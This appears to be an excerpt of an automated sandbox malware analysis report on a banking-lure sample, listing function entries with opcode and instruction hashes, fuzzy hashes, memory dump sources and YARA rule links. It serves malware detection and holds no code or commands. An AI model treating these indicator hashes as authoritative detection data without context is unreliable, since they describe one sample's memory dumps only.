API ID:
String ID:
API String ID:
Opcode ID: 75058b390a850808f7eebd6f4eb7a05de9941f3c484b757e9416b380731acc22
Instruction ID: 0bdabd7356e387cf16b154fbfb72af0876cba74b328fc7d768730c3429f98606
Opcode Fuzzy Hash: 75058b390a850808f7eebd6f4eb7a05de9941f3c484b757e9416b380731acc22
Instruction Fuzzy Hash: E6F04470E00209DBDF00EFA9D8458EFBBB2EB88220F108A66D621B3244DB7096109B91

Uniqueness

Uniqueness Score: -1.00%

Function 05E94CD8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e95a572ba89f442b63507a2dc1d91125efa1839dd746e4a3a51ec0dbce93cf
Instruction ID: 0abc64c89dd29c3de8c0014a629212445f5f8ba30e01f61b1d89b2e9ba8ff2cc
Opcode Fuzzy Hash: 32e95a572ba89f442b63507a2dc1d91125efa1839dd746e4a3a51ec0dbce93cf
Instruction Fuzzy Hash: 90E0D8E6708221AB5E1DB26A6C086FF6A9FFBDA4E03101437E54BC72D1ED648C0252F5

Uniqueness

Uniqueness Score: -1.00%

Function 05DB79D7 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f0458250f42e3a9c60a98367c0aa2cfd98b64b352f29ba830e65bb3c4f6271
Instruction ID: 4039b83d8f4d2ca4b1385ebbe902d23059ef83da77dbb8bf9f3b8f21f60b318b
Opcode Fuzzy Hash: 48f0458250f42e3a9c60a98367c0aa2cfd98b64b352f29ba830e65bb3c4f6271
Instruction Fuzzy Hash: 7CE0E532310100ABF21085599C11BA2369BEBC6720F14016BE60BCB7E1D9D5D8014250

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F687 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30c58d1573016c4964f4ab1848d30905b8acd9d1519614eb230fab4083e634f9
Instruction ID: a1061b950d193fec4aba8b72bd9e7a040e25c365378a7470781b4615a7341f5c
Opcode Fuzzy Hash: 30c58d1573016c4964f4ab1848d30905b8acd9d1519614eb230fab4083e634f9
Instruction Fuzzy Hash: 4EF0A73AB041046FC714CA59E440F9EBBA6EFC4750B24C12AF909DB364C631DC129B90

Uniqueness

Uniqueness Score: -1.00%

Function 05E96F58 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7f6c1138873397a2a51b2ba25345a808553965ca63593a05bcf43dd84f86d6f
Instruction ID: 25c47d11e9f4451df9a15ccf0aa44f87e0d571f2a9d6a0839305535dfb0b457c
Opcode Fuzzy Hash: f7f6c1138873397a2a51b2ba25345a808553965ca63593a05bcf43dd84f86d6f
Instruction Fuzzy Hash: 8DE06D322192389FDF18EAA4E4546FA739BEB412D4F581877E0CF86904EA2168404382

Uniqueness

Uniqueness Score: -1.00%

Function 05E91638 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57d4577ef096b1f71cc5761abc9b4b3282584f4b5d0172842776d64679082fe
Instruction ID: 6f2c5bddde3cf3ec9a0ac27321ca267b2dc1a5b2c1406dbea5c020fb2156d4e7
Opcode Fuzzy Hash: e57d4577ef096b1f71cc5761abc9b4b3282584f4b5d0172842776d64679082fe
Instruction Fuzzy Hash: 16E09221B082E287CE2C9099C4107FF66CF97D5594F1C511BD1C7837C2EAE1980AC2A6

Uniqueness

Uniqueness Score: -1.00%

Function 05E97600 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 542efb508adbe180d8056fdad53f2259d80b3ce24b9ebe065d57f5d2f614f99e
Instruction ID: a4ade73976436d3ae550f886e7f379432641e61b754bfe5f501bc71e4880fab0
Opcode Fuzzy Hash: 542efb508adbe180d8056fdad53f2259d80b3ce24b9ebe065d57f5d2f614f99e
Instruction Fuzzy Hash: 02E02232B001086FDF24A7F9D889A9A3B9AEBC52A4F010070E289C7321EA548C8487D0

Uniqueness

Uniqueness Score: -1.00%

Function 05E93A10 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edcf6190bfe6fb980425fa86d5ed7bcd7a02c46e6309d544bf4a268c34727f37
Instruction ID: be484e79e4a57afbb9459d53e5015c6b0aeabbdf7d3187c3b8bd4daa1810d4dd
Opcode Fuzzy Hash: edcf6190bfe6fb980425fa86d5ed7bcd7a02c46e6309d544bf4a268c34727f37
Instruction Fuzzy Hash: C9E06D32B04108EBDF18DE49D841DFB77AFEBDCA60B009D17B94696250EAF19C1167E2

Uniqueness

Uniqueness Score: -1.00%

Function 05DB7CC0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365786a8e98868dc6aa87a9bd1719381af42a761ac2479f679f52afc359bb291
Instruction ID: ef85fd1c92a34934edde2785f1b067e2e78b48c906f70df0849e3318f4e23509
Opcode Fuzzy Hash: 365786a8e98868dc6aa87a9bd1719381af42a761ac2479f679f52afc359bb291
Instruction Fuzzy Hash: F5E02631B08110E3A514916B2C809BB759FE3C9160B50003FF24BDF341CCE2CC0683B1

Uniqueness

Uniqueness Score: -1.00%

Function 00E64010 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf63ede87162b94f4903060ff3a3cd4f96876f0a4e553095ed70910969ccf3a
Instruction ID: 9ea11271c3cdd60d3b87aa70e69511cb8b85fb9334bdd06b1e39077cd72df2e7
Opcode Fuzzy Hash: 8bf63ede87162b94f4903060ff3a3cd4f96876f0a4e553095ed70910969ccf3a
Instruction Fuzzy Hash: 74F0E5B134C164DFC754A798A804AAA3BA9DFC7745F2410ABE207DB6B1CA208C45A793

Uniqueness

Uniqueness Score: -1.00%

Function 05DB44B8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a4f5573b7f30c17e6a2f79ecc370defb6c9d418e7ce7db00b3d5c88516eebd
Instruction ID: 6577b5b4195e0c15eaadb88728e9cc0642e128ff1b37ed3c18534d0a3f81e391
Opcode Fuzzy Hash: c9a4f5573b7f30c17e6a2f79ecc370defb6c9d418e7ce7db00b3d5c88516eebd
Instruction Fuzzy Hash: 6FF0E220A0D6A0CBEB11C2155C201B5FFE36B42111F088BDFC0D78A69BE2E5C980C392

Uniqueness

Uniqueness Score: -1.00%

Function 05DB31B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fdd7ce9a69e42d9da8f1cdaacd8676ea00a002e08abb8ce5c9cd387079f8fb7
Instruction ID: 18f8783094f7653e49dc34a988ba17a93f98ea13ac5dc167a5864b9b5a9587ec
Opcode Fuzzy Hash: 2fdd7ce9a69e42d9da8f1cdaacd8676ea00a002e08abb8ce5c9cd387079f8fb7
Instruction Fuzzy Hash: 4BF0A035704114E7DB04CE45DC05FEE3B6FAB896A0F008813F94342250CBF0DC14A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 05DBB2C0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0e8c46bbba1d1ce56796c247d7c1b791d0b1686d79f166509abd50f0e5beb0
Instruction ID: e253cc3935ae4aa5f3cf41423dc7443cde95a86d52fcc550cc4fe7e3d125a1ce
Opcode Fuzzy Hash: 3b0e8c46bbba1d1ce56796c247d7c1b791d0b1686d79f166509abd50f0e5beb0
Instruction Fuzzy Hash: 01E08C25B1C020D33D04A24F6C086FE2A9FB6CD4623580027E48BC3354CEE0CC0293AB

Uniqueness

Uniqueness Score: -1.00%

Function 05DBDA1B Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5de4f9e5ba533203e687c5f2cc39826c4a492793855a4fa83f88ff975f4fac
Instruction ID: 37645650e72edc0d47e8ce0cd789c8b3431049dce296bed52ce18a20e8ad6bf7
Opcode Fuzzy Hash: 4b5de4f9e5ba533203e687c5f2cc39826c4a492793855a4fa83f88ff975f4fac
Instruction Fuzzy Hash: 95F0F434B0420ACBEB10EBA4D498BEE77B3FB49600F208416D013EB294DBB0AD45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05DBDA12 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5de4f9e5ba533203e687c5f2cc39826c4a492793855a4fa83f88ff975f4fac
Instruction ID: 37645650e72edc0d47e8ce0cd789c8b3431049dce296bed52ce18a20e8ad6bf7
Opcode Fuzzy Hash: 4b5de4f9e5ba533203e687c5f2cc39826c4a492793855a4fa83f88ff975f4fac
Instruction Fuzzy Hash: 95F0F434B0420ACBEB10EBA4D498BEE77B3FB49600F208416D013EB294DBB0AD45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 05E92E50 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43cca7c0af68b22738a056bd4538628c1faf7fe04f46f333605b5141e3ce90d1
Instruction ID: 5a79bff5130a46732f4a3e60dc9d9effc304fa2f7b7efc5cc4598e438dfd5016
Opcode Fuzzy Hash: 43cca7c0af68b22738a056bd4538628c1faf7fe04f46f333605b5141e3ce90d1
Instruction Fuzzy Hash: 46E0D87E205216FBEF1E5665DC543F6721BFB82215B04607ED2C685240DA3288018381

Uniqueness

Uniqueness Score: -1.00%

Function 05DB5A00 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6bf12d65164daf9d9760eddab8af52e8d1220a41c905c5b8c4a611ca5f9a344
Instruction ID: b51b30257ff4b706f0e8c24223b77bcf2fa0e4a0beeaa734a1e1b7a1bbd9a71d
Opcode Fuzzy Hash: c6bf12d65164daf9d9760eddab8af52e8d1220a41c905c5b8c4a611ca5f9a344
Instruction Fuzzy Hash: 5EF0A932204208DFD729DFA0E8A48E63BB3FB08305340486EE59756210EBB7FC21CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB7990 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745b8ab82c4e2f837ec19f6524f1ebb9e5dabe62fcda893b0781d5444622e524
Instruction ID: 016ca2173df78dc275f5dfad5852d503b1d9bc32e2db4143428fefc4337b37df
Opcode Fuzzy Hash: 745b8ab82c4e2f837ec19f6524f1ebb9e5dabe62fcda893b0781d5444622e524
Instruction Fuzzy Hash: 83E0DF32324820CBAA18B22CC8448BD738BDFC293574807ABD19B9B391CF91ED0047D2

Uniqueness

Uniqueness Score: -1.00%

Function 00E612D8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca1db15f4b0d92e9c07ee87d7d887e9c164b643dddf98fa3d87000f05a07a69
Instruction ID: 4fbf94078516adb2d3a7caa3b942685ca2646e5b5ae39488ebbbed6f28dff338
Opcode Fuzzy Hash: dca1db15f4b0d92e9c07ee87d7d887e9c164b643dddf98fa3d87000f05a07a69
Instruction Fuzzy Hash: 10E09234B501214BCB04B3E4A85836C729AE78235BB001629D10AD7784CF601D898BE6

Uniqueness

Uniqueness Score: -1.00%

Function 05E92E60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888e37514964b01c29d46cdcad16f38df7c3d7a46bbca031afa0eb0551767d32
Instruction ID: b8f2ae1c79d62196cac6a0b856344ca5810950ecc83bfe79448fdda7146f16aa
Opcode Fuzzy Hash: 888e37514964b01c29d46cdcad16f38df7c3d7a46bbca031afa0eb0551767d32
Instruction Fuzzy Hash: 1AE0863C70521AEB9F6E9679D8A41FB725FFBC1219304617ED2C785350DE328C419382

Uniqueness

Uniqueness Score: -1.00%

Function 00E64020 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4336bcc77517746e79a6bf16be1d13741fa2a8bdefe2e4829d5eed89bbb32328
Instruction ID: 38c29d7aa3282add8f39ab251fb3cf7e6eaf17ff3ff741010b595a704e5666ec
Opcode Fuzzy Hash: 4336bcc77517746e79a6bf16be1d13741fa2a8bdefe2e4829d5eed89bbb32328
Instruction Fuzzy Hash: CEE086B1348034DF47945699B4049BB369EDEC57953201066F307E76A0CE608C416793

Uniqueness

Uniqueness Score: -1.00%

Function 05E9CCF0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aefedfcc95798f09a6f9a9d3b3517f2a23b31fcb600b30b603b6fe08f203226
Instruction ID: ef3ef4411fac480477d058a26154bcc783df2fde31e924478f260eb48d9c7bf6
Opcode Fuzzy Hash: 0aefedfcc95798f09a6f9a9d3b3517f2a23b31fcb600b30b603b6fe08f203226
Instruction Fuzzy Hash: 52E0D8717403049FEF2C77708C45BFC23A45F81215F30287ADA899B181D971CC03C650

Uniqueness

Uniqueness Score: -1.00%

Function 05E97300 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f1d33838884ef1aea2355f423ce3ac9ce2162a7a7b791505a936c21f235d779
Instruction ID: 769ceb24b661fc83c4c6c4fb85b25bfb933bb65dc86cce5da15e0f934b3b255e
Opcode Fuzzy Hash: 5f1d33838884ef1aea2355f423ce3ac9ce2162a7a7b791505a936c21f235d779
Instruction Fuzzy Hash: CDD0521437D222D31E2DE2AA28204FE228BC68389439079279EC38B600FD808C0D03EB

Uniqueness

Uniqueness Score: -1.00%

Function 05E9AF88 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8d050511119f675516dc912a848e5a8c7512aeae88260756496a301e6829fd
Instruction ID: 16158ea04247bd7fc22665cfc86f50b686244515df8f96322187485760f3c830
Opcode Fuzzy Hash: 7c8d050511119f675516dc912a848e5a8c7512aeae88260756496a301e6829fd
Instruction Fuzzy Hash: F8E0C2B1B182239E6F6DCDB9C810EB333EB7F845083486879E48ACB144FA30C80087D1

Uniqueness

Uniqueness Score: -1.00%

Function 05E9AF78 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb8d6b1a7e61c4bb80414ee53e0caa0a8fa5e3c0d428c5c5bfcd689e215a4876
Instruction ID: 0882ef2933a7420256565a131c67a10a62b8bb9984bcf0998b6b0b41d8aa9a3b
Opcode Fuzzy Hash: eb8d6b1a7e61c4bb80414ee53e0caa0a8fa5e3c0d428c5c5bfcd689e215a4876
Instruction Fuzzy Hash: D2E086A060C3626DAF2F4BB59D205B73BE36E8106970966BE94EACA1D9FA15C4048251

Uniqueness

Uniqueness Score: -1.00%

Function 05E9CD00 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed2e84a687a2d49910455af70a55bef4842d06df7536b746604af4e4916e7cb2
Instruction ID: 96e63ea16211c1d95d991a2f2d109a0c7589b8ef18f2c4ddd1355a5bf26634cc
Opcode Fuzzy Hash: ed2e84a687a2d49910455af70a55bef4842d06df7536b746604af4e4916e7cb2
Instruction Fuzzy Hash: 12E086703003049BEF1876A48C41BA533D95F85659F61186ADA499F6C0D972DC428365

Uniqueness

Uniqueness Score: -1.00%

Function 00E60438 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688d56b0d0332139bd40cfd82241ca9e8c0c884ed0dfb296f3b5065626defc3f
Instruction ID: f7de077a12f4b122ec952d3686136c7a41c75a6dcef229c47555038d04c84a95
Opcode Fuzzy Hash: 688d56b0d0332139bd40cfd82241ca9e8c0c884ed0dfb296f3b5065626defc3f
Instruction Fuzzy Hash: 1CE0C2200493584FC30A5BA0F8583693F74FB03341B2519C2E108CB0B2C7248C0CC751

Uniqueness

Uniqueness Score: -1.00%

Function 05E98130 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac7379c4178b970d7aa80c60a5ef550bfad2f75f0c31958611293e2a07694c3
Instruction ID: aacf6b35c2654810004c033cc221b12bf9b87ac56919575ede2a6dc2d7abdac2
Opcode Fuzzy Hash: dac7379c4178b970d7aa80c60a5ef550bfad2f75f0c31958611293e2a07694c3
Instruction Fuzzy Hash: D9E09230A05248EFCB04EFB0E5505AD7BB9EB41204F1045DAE8059B150D9311F05AB91

Uniqueness

Uniqueness Score: -1.00%

Function 05E9CCFC Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20af0a4fc671ca34aa630749231d3a5251f2caf0a286f29af4429bed5b21eaa
Instruction ID: d53de57ac64a229a90f04c342a638caf551a81e5f52cf5d345448ca8b3ba582a
Opcode Fuzzy Hash: e20af0a4fc671ca34aa630749231d3a5251f2caf0a286f29af4429bed5b21eaa
Instruction Fuzzy Hash: 41E0CD703403049FEF1C76708C02BB537E9AF85619F30286ADA499F190D572DC02C751

Uniqueness

Uniqueness Score: -1.00%

Function 05DB3170 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bb01060d83cb6f75f93bf8dfe21a57f6ecfe53700645b1e7c47aa90069dfadd
Instruction ID: d65a1e867881026ca169378976268cc1fa975eb658dffbcd84586bc60e2588f8
Opcode Fuzzy Hash: 2bb01060d83cb6f75f93bf8dfe21a57f6ecfe53700645b1e7c47aa90069dfadd
Instruction Fuzzy Hash: 1BE0863A38B114EAF7029E609C09BF5372B67017D0F584507B6479A0E1C6F1D109A616

Uniqueness

Uniqueness Score: -1.00%

Function 00E60B58 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 193281b8cd758eb6fb57540c3e2b094975cded38aff92bf385046db4aef8de95
Instruction ID: 7117bf30786db69a5670ffeb550790a7d5aac29a96101ed6ee9af48ddebe1baa
Opcode Fuzzy Hash: 193281b8cd758eb6fb57540c3e2b094975cded38aff92bf385046db4aef8de95
Instruction Fuzzy Hash: E6D05E345A84348E5A4067B87C0967F3B68E6123FD328EC60D017F0420DEB0C8807263

Uniqueness

Uniqueness Score: -1.00%

Function 05E9813C Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 205b5dfee7bc9849d1ba9df4786daa16037ad863b4a7afc11bef5f462b98c5f1
Instruction ID: d529310062895d4af8b22ec95ffc4c6d211b57f0a952ca0e62ce4595fbd4b9d9
Opcode Fuzzy Hash: 205b5dfee7bc9849d1ba9df4786daa16037ad863b4a7afc11bef5f462b98c5f1
Instruction Fuzzy Hash: EBE08630E01208EFCB04EFB4D9516AD77F5FB45204F104599E805DB254EA311F01A741

Uniqueness

Uniqueness Score: -1.00%

Function 05E91421 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b9a8c288e703d6378a75e9a968a3da873133ea16ef56b606307cca831b3d46
Instruction ID: dfe43d0a13f962421eb85536caf252347f169657f2d06a7394b44a55fbc6d727
Opcode Fuzzy Hash: 08b9a8c288e703d6378a75e9a968a3da873133ea16ef56b606307cca831b3d46
Instruction Fuzzy Hash: A9D0A7317405186BD60273B9F84579F3FDED7466D4F405450F50497A85CE694C6117E4

Uniqueness

Uniqueness Score: -1.00%

Function 05DBBB60 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e990a73198d731a55a7c345e395dac21129bc4d124080abfe7839621d7511f29
Instruction ID: bd22c9878c1adbbfcb679183bca705bece204874520e7ec62e3242519862168e
Opcode Fuzzy Hash: e990a73198d731a55a7c345e395dac21129bc4d124080abfe7839621d7511f29
Instruction Fuzzy Hash: E6E01270D142088FAF20AFB9A85A0ED7FB5F708235B004B6BD5A9D2684E73980518FC5

Uniqueness

Uniqueness Score: -1.00%

Function 00E6128F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

